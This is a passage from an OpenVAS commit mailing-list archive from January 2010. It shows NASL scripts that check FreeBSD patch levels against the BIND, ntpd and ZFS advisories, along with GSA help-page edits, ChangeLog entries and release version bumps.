ver:"1.22-1+lenny2", rls:"DEB5.0")) { + vuln = 1; +} + +if(vuln) { + security_hole(0); +} Added: trunk/openvas-plugins/scripts/freebsdsa_bind8.nasl =================================================================== --- trunk/openvas-plugins/scripts/freebsdsa_bind8.nasl 2010-01-11 22:26:48 UTC (rev 6373) +++ trunk/openvas-plugins/scripts/freebsdsa_bind8.nasl 2010-01-11 22:48:26 UTC (rev 6374) @@ -0,0 +1,94 @@ +# +#ADV FreeBSD-SA-10:01.bind.asc +# OpenVAS Vulnerability Test +# $ +# Description: Auto generated from ADV FreeBSD-SA-10:01.bind.asc +# +# Authors: +# Thomas Reinke +# +# Copyright: +# Copyright (c) 2010 E-Soft Inc. http://www.securityspace.com +# Text descriptions are largely excerpted from the referenced +# advisories, and are Copyright (c) the respective author(s) +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2, +# as published by the Free Software Foundation +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +# + +if(description) +{ + script_id(66661); + script_cve_id("CVE-2009-4022"); + script_version ("$Revision$"); + script_name("FreeBSD Security Advisory (FreeBSD-SA-10:01.bind.asc)"); + + desc = "The remote host is missing an update to the system +as announced in the referenced advisory FreeBSD-SA-10:01.bind.asc + +BIND 9 is an implementation of the Domain Name System (DNS) protocols. +The named(8) daemon is an Internet Domain Name Server. + +DNS Security Extensions (DNSSEC) provides data integrity, origin +authentication and authenticated denial of existence to resolvers. + +If a client requests DNSSEC records with the Checking Disabled (CD) flag +set, BIND may cache the unvalidated responses. These responses may later +be returned to another client that has not set the CD flag. + +Solution: +Upgrade your system to the appropriate stable release +or security branch dated after the correction date + +https://secure1.securityspace.com/smysecure/catid.html?in=FreeBSD-SA-10:01.bind.asc +Risk factor : High"; + + script_description(desc); + + script_summary("FreeBSD Security Advisory (FreeBSD-SA-10:01.bind.asc)"); + + script_category(ACT_GATHER_INFO); + + script_copyright("Copyright (c) 2010 E-Soft Inc. http://www.securityspace.com"); + script_family("FreeBSD Local Security Checks"); + script_dependencies("gather-package-list.nasl"); + script_require_keys("ssh/login/freebsdpatchlevel"); + exit(0); +} + +# +# The script code starts here +# + +include("revisions-lib.inc"); +include("pkg-lib-bsd.inc"); +vuln = 0; +if(patchlevelcmp(rel:"8.0", patchlevel:"2")<0) { + vuln = 1; +} +if(patchlevelcmp(rel:"7.2", patchlevel:"6")<0) { + vuln = 1; +} +if(patchlevelcmp(rel:"7.1", patchlevel:"10")<0) { + vuln = 1; +} +if(patchlevelcmp(rel:"6.4", patchlevel:"9")<0) { + vuln = 1; +} +if(patchlevelcmp(rel:"6.3", patchlevel:"15")<0) { + vuln = 1; +} + +if(vuln) { + security_hole(0); +} Added: trunk/openvas-plugins/scripts/freebsdsa_ntpd2.nasl =================================================================== --- trunk/openvas-plugins/scripts/freebsdsa_ntpd2.nasl 2010-01-11 22:26:48 UTC (rev 6373) +++ trunk/openvas-plugins/scripts/freebsdsa_ntpd2.nasl 2010-01-11 22:48:26 UTC (rev 6374) @@ -0,0 +1,93 @@ +# +#ADV FreeBSD-SA-10:02.ntpd.asc +# OpenVAS Vulnerability Test +# $ +# Description: Auto generated from ADV FreeBSD-SA-10:02.ntpd.asc +# +# Authors: +# Thomas Reinke +# +# Copyright: +# Copyright (c) 2010 E-Soft Inc. http://www.securityspace.com +# Text descriptions are largely excerpted from the referenced +# advisories, and are Copyright (c) the respective author(s) +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2, +# as published by the Free Software Foundation +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +# + +if(description) +{ + script_id(66662); + script_cve_id("CVE-2009-3563"); + script_version ("$Revision$"); + script_name("FreeBSD Security Advisory (FreeBSD-SA-10:02.ntpd.asc)"); + + desc = "The remote host is missing an update to the system +as announced in the referenced advisory FreeBSD-SA-10:02.ntpd.asc + +The ntpd(8) daemon is an implementation of the Network Time Protocol (NTP) +used to synchronize the time of a computer system to a reference time +source. + +If ntpd receives a mode 7 (MODE_PRIVATE) request or error response +from a source address not listed in either a 'restrict ... noquery' +or a 'restrict ... ignore' section it will log the even and send +a mode 7 error response. + +Solution: +Upgrade your system to the appropriate stable release +or security branch dated after the correction date + +https://secure1.securityspace.com/smysecure/catid.html?in=FreeBSD-SA-10:02.ntpd.asc +Risk factor : High"; + + script_description(desc); + + script_summary("FreeBSD Security Advisory (FreeBSD-SA-10:02.ntpd.asc)"); + + script_category(ACT_GATHER_INFO); + + script_copyright("Copyright (c) 2010 E-Soft Inc. http://www.securityspace.com"); + script_family("FreeBSD Local Security Checks"); + script_dependencies("gather-package-list.nasl"); + script_require_keys("ssh/login/freebsdpatchlevel"); + exit(0); +} + +# +# The script code starts here +# + +include("revisions-lib.inc"); +include("pkg-lib-bsd.inc"); +vuln = 0; +if(patchlevelcmp(rel:"8.0", patchlevel:"2")<0) { + vuln = 1; +} +if(patchlevelcmp(rel:"7.2", patchlevel:"6")<0) { + vuln = 1; +} +if(patchlevelcmp(rel:"7.1", patchlevel:"10")<0) { + vuln = 1; +} +if(patchlevelcmp(rel:"6.4", patchlevel:"9")<0) { + vuln = 1; +} +if(patchlevelcmp(rel:"6.3", patchlevel:"15")<0) { + vuln = 1; +} + +if(vuln) { + security_hole(0); +} Added: trunk/openvas-plugins/scripts/freebsdsa_zfs.nasl =================================================================== --- trunk/openvas-plugins/scripts/freebsdsa_zfs.nasl 2010-01-11 22:26:48 UTC (rev 6373) +++ trunk/openvas-plugins/scripts/freebsdsa_zfs.nasl 2010-01-11 22:48:26 UTC (rev 6374) @@ -0,0 +1,89 @@ +# +#ADV FreeBSD-SA-10:03.zfs.asc +# OpenVAS Vulnerability Test +# $ +# Description: Auto generated from ADV FreeBSD-SA-10:03.zfs.asc +# +# Authors: +# Thomas Reinke +# +# Copyright: +# Copyright (c) 2010 E-Soft Inc. http://www.securityspace.com +# Text descriptions are largely excerpted from the referenced +# advisories, and are Copyright (c) the respective author(s) +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2, +# as published by the Free Software Foundation +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +# + +if(description) +{ + script_id(66663); + script_version ("$Revision$"); + script_name("FreeBSD Security Advisory (FreeBSD-SA-10:03.zfs.asc)"); + + desc = "The remote host is missing an update to the system +as announced in the referenced advisory FreeBSD-SA-10:03.zfs.asc + +ZFS is a file-system originally developed by Sun Microsystems. + +The ZFS Intent Log (ZIL) is a mechanism that gathers together in memory +transactions of writes, and is flushed onto disk when synchronous +semantics is necessary. In the event of crash or power failure, the +log is examined and the uncommitted transaction would be replayed to +maintain the synchronous semantics. + +When replaying setattr transaction, the replay code would set the +attributes with certain insecure defaults, when the logged +transaction did not touch these attributes. + +Solution: +Upgrade your system to the appropriate stable release +or security branch dated after the correction date + +https://secure1.securityspace.com/smysecure/catid.html?in=FreeBSD-SA-10:03.zfs.asc +Risk factor : High"; + + script_description(desc); + + script_summary("FreeBSD Security Advisory (FreeBSD-SA-10:03.zfs.asc)"); + + script_category(ACT_GATHER_INFO); + + script_copyright("Copyright (c) 2010 E-Soft Inc. http://www.securityspace.com"); + script_family("FreeBSD Local Security Checks"); + script_dependencies("gather-package-list.nasl"); + script_require_keys("ssh/login/freebsdpatchlevel"); + exit(0); +} + +# +# The script code starts here +# + +include("revisions-lib.inc"); +include("pkg-lib-bsd.inc"); +vuln = 0; +if(patchlevelcmp(rel:"8.0", patchlevel:"2")<0) { + vuln = 1; +} +if(patchlevelcmp(rel:"7.2", patchlevel:"6")<0) { + vuln = 1; +} +if(patchlevelcmp(rel:"7.1", patchlevel:"10")<0) { + vuln = 1; +} + +if(vuln) { + security_hole(0); +} From scm-commit at wald.intevation.org Tue Jan 12 09:22:54 2010 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Tue, 12 Jan 2010 09:22:54 +0100 (CET) Subject: [Openvas-commits] r6375 - in trunk/gsa: . src/html/src src/html/src/help Message-ID: <20100112082254.56DD686607A3@pyrosoma.intevation.org> Author: felix Date: 2010-01-12 09:22:52 +0100 (Tue, 12 Jan 2010) New Revision: 6375 Modified: trunk/gsa/ChangeLog trunk/gsa/src/html/src/help/scanconfig_details.htm4 trunk/gsa/src/html/src/help/scanconfig_editor.htm4 trunk/gsa/src/html/src/omp.xsl Log: Added help. * src/html/src/help/scanconfig_editor.htm4: Updated with help texts describing the Scan Config Editor functionality. * src/html/src/help/scanconfig_details.htm4: Added alt and title parameters to icons, corrected heading. * src/html/src/omp.xsl: Added link to new help page. Modified: trunk/gsa/ChangeLog =================================================================== --- trunk/gsa/ChangeLog 2010-01-11 22:48:26 UTC (rev 6374) +++ trunk/gsa/ChangeLog 2010-01-12 08:22:52 UTC (rev 6375) @@ -1,3 +1,15 @@ +2010-01-12 Felix Wolfsteller + + Added help. + + * src/html/src/help/scanconfig_editor.htm4: Updated with help + texts describing the Scan Config Editor functionality. + + * src/html/src/help/scanconfig_details.htm4: Added alt and title + parameters to icons, corrected heading. + + * src/html/src/omp.xsl: Added link to new help page. + 2010-01-11 Matthew Mundell Add text phrase filtering to report results. @@ -24,7 +36,7 @@ 2010-01-11 Felix Wolfsteller - Updated help + Updated help. * src/html/src/help/configure_credentials.htm4, src/html/src/help/configure_escalators.html4, Modified: trunk/gsa/src/html/src/help/scanconfig_details.htm4 =================================================================== --- trunk/gsa/src/html/src/help/scanconfig_details.htm4 2010-01-11 22:48:26 UTC (rev 6374) +++ trunk/gsa/src/html/src/help/scanconfig_details.htm4 2010-01-12 08:22:52 UTC (rev 6375) @@ -18,8 +18,8 @@

            This table provides an overview of the selected NVTs and NVT Families. A Trend icon next to the Family column of the table indicates whether new -families will automaticall be included ("Grow") -or not ("Static") . +families will automaticall be included ("Grow") Grow.

            @@ -39,8 +39,8 @@ + automatically added to the configuration ("Grow") Grow or + not ("Static") Static.
            Trend Shows the Trend, which indicates whether new NVTs of this family are - automatically added to the configuration ("Grow") or - not ("Static") .
            @@ -49,7 +49,7 @@

            Scan Config Family Details

            -A click on the details icon will show an +A click on the details icon Details will show an intermediate detailled list of NVTs and its preferences.

            @@ -104,10 +104,11 @@

            Actions

            -

            Scan Config Family Details

            +

            Scan Config NVT Details

            -A click on the details icon will open the +A click on the details icon +Details will open the Scan Config NVT Details dialog with detailed information about a certain NVT and all its preferences.

            @@ -116,7 +117,7 @@

            The tasks that use the shown config are listed. -A click on the list icon will open +A click on the list icon List will open the Task summary page.

            Modified: trunk/gsa/src/html/src/help/scanconfig_editor.htm4 =================================================================== --- trunk/gsa/src/html/src/help/scanconfig_editor.htm4 2010-01-11 22:48:26 UTC (rev 6374) +++ trunk/gsa/src/html/src/help/scanconfig_editor.htm4 2010-01-12 08:22:52 UTC (rev 6375) @@ -6,5 +6,158 @@

            Scan Config Editor

            +

            +The Scan Config Editor allows modification of all parameters of a +Scan Configuration. +These include a selection of NVTs and the +specifications how the selection should automatically updated, NVT Preferences +and Timeouts and advanced Scanner Preferences. +

            +

            Edit Scan Config Details

            + +

            +This dialog shows the name and comment of a given +Scan Configuration together with the +associated configuration parameters itself. +It allows to adjust all parameters of the Scan Configuration. +

            + +

            +Note: In order to save modifications, the button labelled "Save Config" must +be clicked. The edit action Edit +on NVT Families will save the selection. +

            + +

            Edit Network Vulnerability Test Families

            + +

            +This table provides an overview of the selected NVTs and NVT Families and allow +to choose which Families or individual NVTs should be included. +

            + + + + + + + + + + + + + + + + + + + + + + +
            ColumnDescription
            FamilyShows the name of the NVT Family. The trend icon in the Family column + header allows to specify whether new families will automaticall be + included ("Grow") Grow or not ("Static") + Static.
            NVT's selectedShows the number of NVTs that would be considered with the current + selection and the total number of NVTs in this family.
            TrendAllows modification of the trend for this family. If the trend is set to + "Grow" Grow, new NVTs of this family are + automatically added to the configuration. If it is set to "Static" + Static, the selection will not be + automatically changed.
            Select all NVT'sIf this checkbox is ticked, all NVTs that are currently available in this + Family will be selected.
            + +

            Actions

            + +

            Save Config and edit Family Details

            + +

            +A click on the edit icon Edit +will save the modifications and show the +Edit Scan Config Family Details +page which shows details about NVTs within the family and allows to select or +deselect individual NVTs. +

            + +

            Edit Scanner Preferences

            + +

            +This table shows the preferences of the scan engine itself and allows to modify +these. This feature is intended for advanced users only. Modifications will be +saved after a click on the "Save Config" button below the table. +

            + + + + + + + + + + + + + + +
            ColumnDescription
            NameShows the name of the Scanner Preference.
            ValueShows the current value of the Scanner Preference.
            + + +

            Network Vulnerability Test Preferences

            + +

            +Network Vulnerability Tests can have multiple preferences that influence the +test behaviour. +This table lists one preference and the current value per row. +

            + + + + + + + + + + + + + + + + + + +
            ColumnDescription
            NVTShows the name of an NVT.
            NameShows the name of a prefence for an NVT.
            ValueShows current value of a prefence for an NVT.
            + +

            Actions

            + +

            Scan Config NVT Details

            + +

            +A click on the details icon +Details will open the +Scan Config NVT Details dialog with detailed information about a certain NVT +and all its preferences. +

            + +

            Edit Scan Config NVT Details

            + +

            +A click on the edit icon Edit +will open the Edit Scan Config NVT Details dialog with detailed information about a +certain NVT and all its preferences. +This page will provide an overview over all preferences and the currently set +Timeout for this NVT and allow modifications. +

            + +

            Tasks using this Config

            + +

            +The tasks that use the shown config are listed. +A click on the list icon List will open +the Task summary page. +

            + m4_include(`footer.m4') Modified: trunk/gsa/src/html/src/omp.xsl =================================================================== --- trunk/gsa/src/html/src/omp.xsl 2010-01-11 22:48:26 UTC (rev 6374) +++ trunk/gsa/src/html/src/omp.xsl 2010-01-12 08:22:52 UTC (rev 6375) @@ -3445,12 +3445,16 @@ Edit Scan Config Details + + + Scan Config Details - + From scm-commit at wald.intevation.org Tue Jan 12 10:54:23 2010 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Tue, 12 Jan 2010 10:54:23 +0100 (CET) Subject: [Openvas-commits] r6376 - in trunk/gsa: . src/html src/html/src src/html/src/help Message-ID: <20100112095423.927A586607B0@pyrosoma.intevation.org> Author: felix Date: 2010-01-12 10:54:22 +0100 (Tue, 12 Jan 2010) New Revision: 6376 Added: trunk/gsa/src/html/src/help/scanconfig_editor_nvt_families.htm4 Modified: trunk/gsa/ChangeLog trunk/gsa/src/html/header.m4 trunk/gsa/src/html/src/help/scanconfig_details.htm4 trunk/gsa/src/html/src/help/scanconfig_editor.htm4 trunk/gsa/src/html/src/omp.xsl Log: Added help and some fixes. * src/html/src/help/scanconfig_editor_nvt_families.htm4: New. Contains help texts regarding Scan Config Editors Family Details functionality. * src/html/src/help/scanconfig_editor.htm4: Fixed closing tags, added note about non-modificatability of scan configs in use. * src/html/src/help/scanconfig_details.htm4: Fixed/Added missing quote. * src/html/header.m4: Added macros for details and edit icons. * src/html/src/omp.xsl: Added link to new help page. Modified: trunk/gsa/ChangeLog =================================================================== --- trunk/gsa/ChangeLog 2010-01-12 08:22:52 UTC (rev 6375) +++ trunk/gsa/ChangeLog 2010-01-12 09:54:22 UTC (rev 6376) @@ -1,5 +1,21 @@ 2010-01-12 Felix Wolfsteller + Added help and some fixes. + + * src/html/src/help/scanconfig_editor_nvt_families.htm4: New. Contains + help texts regarding Scan Config Editors Family Details functionality. + + * src/html/src/help/scanconfig_editor.htm4: Fixed closing tags, added + note about non-modificatability of scan configs in use. + + * src/html/src/help/scanconfig_details.htm4: Fixed/Added missing quote. + + * src/html/header.m4: Added macros for details and edit icons. + + * src/html/src/omp.xsl: Added link to new help page. + +2010-01-12 Felix Wolfsteller + Added help. * src/html/src/help/scanconfig_editor.htm4: Updated with help Modified: trunk/gsa/src/html/header.m4 =================================================================== --- trunk/gsa/src/html/header.m4 2010-01-12 08:22:52 UTC (rev 6375) +++ trunk/gsa/src/html/header.m4 2010-01-12 09:54:22 UTC (rev 6376) @@ -1,3 +1,6 @@ +m4_define(`GSAD_HTML_ICON_EDIT', `Edit') +m4_define(`GSAD_HTML_ICON_DETAILS', `Details') + Modified: trunk/gsa/src/html/src/help/scanconfig_details.htm4 =================================================================== --- trunk/gsa/src/html/src/help/scanconfig_details.htm4 2010-01-12 08:22:52 UTC (rev 6375) +++ trunk/gsa/src/html/src/help/scanconfig_details.htm4 2010-01-12 09:54:22 UTC (rev 6376) @@ -18,7 +18,7 @@

            This table provides an overview of the selected NVTs and NVT Families. A Trend icon next to the Family column of the table indicates whether new -families will automaticall be included ("Grow") Grow or not ("Static") Static.

            Modified: trunk/gsa/src/html/src/help/scanconfig_editor.htm4 =================================================================== --- trunk/gsa/src/html/src/help/scanconfig_editor.htm4 2010-01-12 08:22:52 UTC (rev 6375) +++ trunk/gsa/src/html/src/help/scanconfig_editor.htm4 2010-01-12 09:54:22 UTC (rev 6376) @@ -14,6 +14,10 @@ and Timeouts and advanced Scanner Preferences.

            +

            +Note that only Scan Configurations that are not currently in use by a +Task allow modifications. +

            Edit Scan Config Details

            @@ -70,7 +74,7 @@

            Actions

            -

            Save Config and edit Family Details

            +

            Save Config and edit Family Details

            A click on the edit icon Edit @@ -133,7 +137,7 @@

            Actions

            -

            Scan Config NVT Details

            +

            Scan Config NVT Details

            A click on the details icon @@ -142,7 +146,7 @@ and all its preferences.

            -

            Edit Scan Config NVT Details

            +

            Edit Scan Config NVT Details

            A click on the edit icon Edit @@ -160,4 +164,5 @@ the Task summary page.

            + m4_include(`footer.m4') Added: trunk/gsa/src/html/src/help/scanconfig_editor_nvt_families.htm4 =================================================================== --- trunk/gsa/src/html/src/help/scanconfig_editor_nvt_families.htm4 2010-01-12 08:22:52 UTC (rev 6375) +++ trunk/gsa/src/html/src/help/scanconfig_editor_nvt_families.htm4 2010-01-12 09:54:22 UTC (rev 6376) @@ -0,0 +1,68 @@ +m4_define(`PAGE_TITLE', `Help: Edit Scan Config Family Details') +m4_include(`header.m4') + +
            + + +

            Edit Scan Config Family Details

            + +

            +This page gives an overview of NVTs of one family in a Scan Configuration. +

            + +

            Edit Network Vulnerability Tests

            + +

            +This table provides an overview of NVTs of one family in a Scan Configuration +and allows to include or exclude a NVT and to modify its preferences or timeout. +

            + + + + + + + + + + + + + + + + + + + + + + + + + + +
            ColumnDescription
            NameShows the name of a NVT.
            OIDShows the OID of a NVT.
            TimeoutShows current timeout setting in seconds for a NVT (or "default" if the + default value is used).
            PreferencesShows the number of Preferences of a NVT.
            SelectedShows whether the NVT is included in the Scan Config or not and allows to + add or remove it from the selection.
            + +

            Actions

            + +

            NVT Details

            + +

            +A click on the details icon GSAD_HTML_ICON_DETAILS +will lead to the page listing NVT details. +

            + +

            Select and Edit NVT Details

            + +

            +A click on the edit icon GSAD_HTML_ICON_EDIT will add the NVT to the selection +and lead to a page that lists NVT details and allows to modify preferences and +the timeout. +

            + + +m4_include(`footer.m4') Modified: trunk/gsa/src/html/src/omp.xsl =================================================================== --- trunk/gsa/src/html/src/omp.xsl 2010-01-12 08:22:52 UTC (rev 6375) +++ trunk/gsa/src/html/src/omp.xsl 2010-01-12 09:54:22 UTC (rev 6376) @@ -2535,14 +2535,20 @@
            - - -
            Edit Scan Config Family Details
            -             - -
            Scan Config Family Details
            -             -             +
            + + + Edit Scan Config Family Details + + + + + + Scan Config Family Details + + +
            From scm-commit at wald.intevation.org Tue Jan 12 11:29:36 2010 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Tue, 12 Jan 2010 11:29:36 +0100 (CET) Subject: [Openvas-commits] r6377 - trunk/openvas-manager Message-ID: <20100112102936.429B486607B0@pyrosoma.intevation.org> Author: mwiegand Date: 2010-01-12 11:29:34 +0100 (Tue, 12 Jan 2010) New Revision: 6377 Modified: trunk/openvas-manager/CHANGES trunk/openvas-manager/CMakeLists.txt trunk/openvas-manager/ChangeLog Log: Preparing the openvas-manager 1.0.0-beta1 release. * CMakeLists.txt: Updated version number. * CHANGES: Updated. Modified: trunk/openvas-manager/CHANGES =================================================================== --- trunk/openvas-manager/CHANGES 2010-01-12 09:54:22 UTC (rev 6376) +++ trunk/openvas-manager/CHANGES 2010-01-12 10:29:34 UTC (rev 6377) @@ -1,3 +1,25 @@ +openvas-manager 1.0.0-beta1 (2010-01-12) + +This is the first beta release of the openvas-manager module +for the Open Vulnerability Assessment System (OpenVAS) leading up to the +upcoming openvas-manager 1.0. + +Many thanks to everyone who has contributed to this release: +Matthew Mundell, Felix Wolfsteller and Michael Wiegand. + +Main changes since 0.9.8: + +* Agent support has been improved. +* Escalation support has been added. +* A bug in PDF generation which could cause the manager to stay in an infinite + loop under certain conditions has been fixed. +* Support for exporting scan configurations has been added. +* Support for performance monitoring has been added. +* An issue which could cause some preferences not to be sent to the scanner has + been fixed. +* Initial searching support has been added. + + openvas-manager 0.9.8 (2009-12-21) This is the fourteenth development release of the openvas-manager module Modified: trunk/openvas-manager/CMakeLists.txt =================================================================== --- trunk/openvas-manager/CMakeLists.txt 2010-01-12 09:54:22 UTC (rev 6376) +++ trunk/openvas-manager/CMakeLists.txt 2010-01-12 10:29:34 UTC (rev 6377) @@ -70,9 +70,9 @@ set (CPACK_SOURCE_TOPLEVEL_TAG "") set (CPACK_SYSTEM_NAME "") set (CPACK_TOPLEVEL_TAG "") -set (CPACK_PACKAGE_VERSION_MAJOR "0") -set (CPACK_PACKAGE_VERSION_MINOR "9") -set (CPACK_PACKAGE_VERSION_PATCH "9${SVN_REVISION}") +set (CPACK_PACKAGE_VERSION_MAJOR "1") +set (CPACK_PACKAGE_VERSION_MINOR "0") +set (CPACK_PACKAGE_VERSION_PATCH "0-beta1${SVN_REVISION}") set (CPACK_PACKAGE_VERSION "${CPACK_PACKAGE_VERSION_MAJOR}.${CPACK_PACKAGE_VERSION_MINOR}.${CPACK_PACKAGE_VERSION_PATCH}") set (CPACK_PACKAGE_FILE_NAME "${PROJECT_NAME}-${CPACK_PACKAGE_VERSION}") set (CPACK_SOURCE_PACKAGE_FILE_NAME "${PROJECT_NAME}-${CPACK_PACKAGE_VERSION}") Modified: trunk/openvas-manager/ChangeLog =================================================================== --- trunk/openvas-manager/ChangeLog 2010-01-12 09:54:22 UTC (rev 6376) +++ trunk/openvas-manager/ChangeLog 2010-01-12 10:29:34 UTC (rev 6377) @@ -1,3 +1,11 @@ +2010-01-12 Michael Wiegand + + Preparing the openvas-manager 1.0.0-beta1 release. + + * CMakeLists.txt: Updated version number. + + * CHANGES: Updated. + 2010-01-11 Matthew Mundell Add a search_phrase attribute to OMP GET_REPORT and switch GET_REPORT to From scm-commit at wald.intevation.org Tue Jan 12 11:35:41 2010 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Tue, 12 Jan 2010 11:35:41 +0100 (CET) Subject: [Openvas-commits] r6378 - tags Message-ID: <20100112103541.1C07686607B0@pyrosoma.intevation.org> Author: mwiegand Date: 2010-01-12 11:35:40 +0100 (Tue, 12 Jan 2010) New Revision: 6378 Added: tags/openvas-manager-release-1.0.0-beta1/ Log: Tagging the openvas-manager 1.0.0-beta1 release. Copied: tags/openvas-manager-release-1.0.0-beta1 (from rev 6377, trunk/openvas-manager) From scm-commit at wald.intevation.org Tue Jan 12 11:37:24 2010 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Tue, 12 Jan 2010 11:37:24 +0100 (CET) Subject: [Openvas-commits] r6379 - trunk/openvas-manager Message-ID: <20100112103724.A776286607B0@pyrosoma.intevation.org> Author: mwiegand Date: 2010-01-12 11:37:24 +0100 (Tue, 12 Jan 2010) New Revision: 6379 Modified: trunk/openvas-manager/CMakeLists.txt trunk/openvas-manager/ChangeLog Log: Post-release version bump. * CMakeLists.txt: Updated version number. Modified: trunk/openvas-manager/CMakeLists.txt =================================================================== --- trunk/openvas-manager/CMakeLists.txt 2010-01-12 10:35:40 UTC (rev 6378) +++ trunk/openvas-manager/CMakeLists.txt 2010-01-12 10:37:24 UTC (rev 6379) @@ -72,7 +72,7 @@ set (CPACK_TOPLEVEL_TAG "") set (CPACK_PACKAGE_VERSION_MAJOR "1") set (CPACK_PACKAGE_VERSION_MINOR "0") -set (CPACK_PACKAGE_VERSION_PATCH "0-beta1${SVN_REVISION}") +set (CPACK_PACKAGE_VERSION_PATCH "0-beta2${SVN_REVISION}") set (CPACK_PACKAGE_VERSION "${CPACK_PACKAGE_VERSION_MAJOR}.${CPACK_PACKAGE_VERSION_MINOR}.${CPACK_PACKAGE_VERSION_PATCH}") set (CPACK_PACKAGE_FILE_NAME "${PROJECT_NAME}-${CPACK_PACKAGE_VERSION}") set (CPACK_SOURCE_PACKAGE_FILE_NAME "${PROJECT_NAME}-${CPACK_PACKAGE_VERSION}") Modified: trunk/openvas-manager/ChangeLog =================================================================== --- trunk/openvas-manager/ChangeLog 2010-01-12 10:35:40 UTC (rev 6378) +++ trunk/openvas-manager/ChangeLog 2010-01-12 10:37:24 UTC (rev 6379) @@ -1,5 +1,11 @@ 2010-01-12 Michael Wiegand + Post-release version bump. + + * CMakeLists.txt: Updated version number. + +2010-01-12 Michael Wiegand + Preparing the openvas-manager 1.0.0-beta1 release. * CMakeLists.txt: Updated version number. From scm-commit at wald.intevation.org Tue Jan 12 11:58:38 2010 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Tue, 12 Jan 2010 11:58:38 +0100 (CET) Subject: [Openvas-commits] r6380 - in trunk/gsa: . src/html/src/help Message-ID: <20100112105838.1BCD086607C5@pyrosoma.intevation.org> Author: felix Date: 2010-01-12 11:58:37 +0100 (Tue, 12 Jan 2010) New Revision: 6380 Modified: trunk/gsa/ChangeLog trunk/gsa/src/html/src/help/scanconfig_editor.htm4 trunk/gsa/src/html/src/help/scanconfig_editor_nvt_families.htm4 Log: Minor help improvements and fixes. * src/html/src/help/scanconfig_editor.htm4: Fixed link. * src/html/src/help/scanconfig_editor_nvt_families.htm4: Added links to glossary. Modified: trunk/gsa/ChangeLog =================================================================== --- trunk/gsa/ChangeLog 2010-01-12 10:37:24 UTC (rev 6379) +++ trunk/gsa/ChangeLog 2010-01-12 10:58:37 UTC (rev 6380) @@ -1,5 +1,14 @@ 2010-01-12 Felix Wolfsteller + Minor help improvements and fixes. + + * src/html/src/help/scanconfig_editor.htm4: Fixed link. + + * src/html/src/help/scanconfig_editor_nvt_families.htm4: Added links + to glossary. + +2010-01-12 Felix Wolfsteller + Added help and some fixes. * src/html/src/help/scanconfig_editor_nvt_families.htm4: New. Contains Modified: trunk/gsa/src/html/src/help/scanconfig_editor.htm4 =================================================================== --- trunk/gsa/src/html/src/help/scanconfig_editor.htm4 2010-01-12 10:37:24 UTC (rev 6379) +++ trunk/gsa/src/html/src/help/scanconfig_editor.htm4 2010-01-12 10:58:37 UTC (rev 6380) @@ -78,8 +78,8 @@

            A click on the edit icon Edit -will save the modifications and show the -Edit Scan Config Family Details +will save the modifications and show the +Edit Scan Config Family Details page which shows details about NVTs within the family and allows to select or deselect individual NVTs.

            Modified: trunk/gsa/src/html/src/help/scanconfig_editor_nvt_families.htm4 =================================================================== --- trunk/gsa/src/html/src/help/scanconfig_editor_nvt_families.htm4 2010-01-12 10:37:24 UTC (rev 6379) +++ trunk/gsa/src/html/src/help/scanconfig_editor_nvt_families.htm4 2010-01-12 10:58:37 UTC (rev 6380) @@ -8,7 +8,8 @@

            Edit Scan Config Family Details

            -This page gives an overview of NVTs of one family in a Scan Configuration. +This page gives an overview of NVTs of one +family in a Scan Configuration.

            Edit Network Vulnerability Tests

            From scm-commit at wald.intevation.org Tue Jan 12 12:00:58 2010 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Tue, 12 Jan 2010 12:00:58 +0100 (CET) Subject: [Openvas-commits] r6381 - in trunk/gsa: . src/html/src Message-ID: <20100112110058.1FA1686607DB@pyrosoma.intevation.org> Author: mwiegand Date: 2010-01-12 12:00:57 +0100 (Tue, 12 Jan 2010) New Revision: 6381 Added: trunk/gsa/CHANGES Modified: trunk/gsa/CMakeLists.txt trunk/gsa/ChangeLog trunk/gsa/src/html/src/about.htm4 Log: Preparing the gsa 1.0.0-beta1 release. * CMakeLists.txt: Updated version number. * src/html/src/about.htm4: Updated. * CHANGES: New. Added: trunk/gsa/CHANGES =================================================================== --- trunk/gsa/CHANGES 2010-01-12 10:58:37 UTC (rev 6380) +++ trunk/gsa/CHANGES 2010-01-12 11:00:57 UTC (rev 6381) @@ -0,0 +1,9 @@ +gsa 1.0.0-beta1 (2010-01-12) + +This is the first beta release of the optional gsa module +for the Open Vulnerability Assessment System (OpenVAS) leading up to the +upcoming gsa 1.0. + +Many thanks to everyone who has contributed to this release: +Matthew Mundell, Jan-Oliver Wagner, Felix Wolfsteller and Michael Wiegand. + Modified: trunk/gsa/CMakeLists.txt =================================================================== --- trunk/gsa/CMakeLists.txt 2010-01-12 10:58:37 UTC (rev 6380) +++ trunk/gsa/CMakeLists.txt 2010-01-12 11:00:57 UTC (rev 6381) @@ -152,9 +152,9 @@ SET(CPACK_SOURCE_TOPLEVEL_TAG "") SET(CPACK_SYSTEM_NAME "") 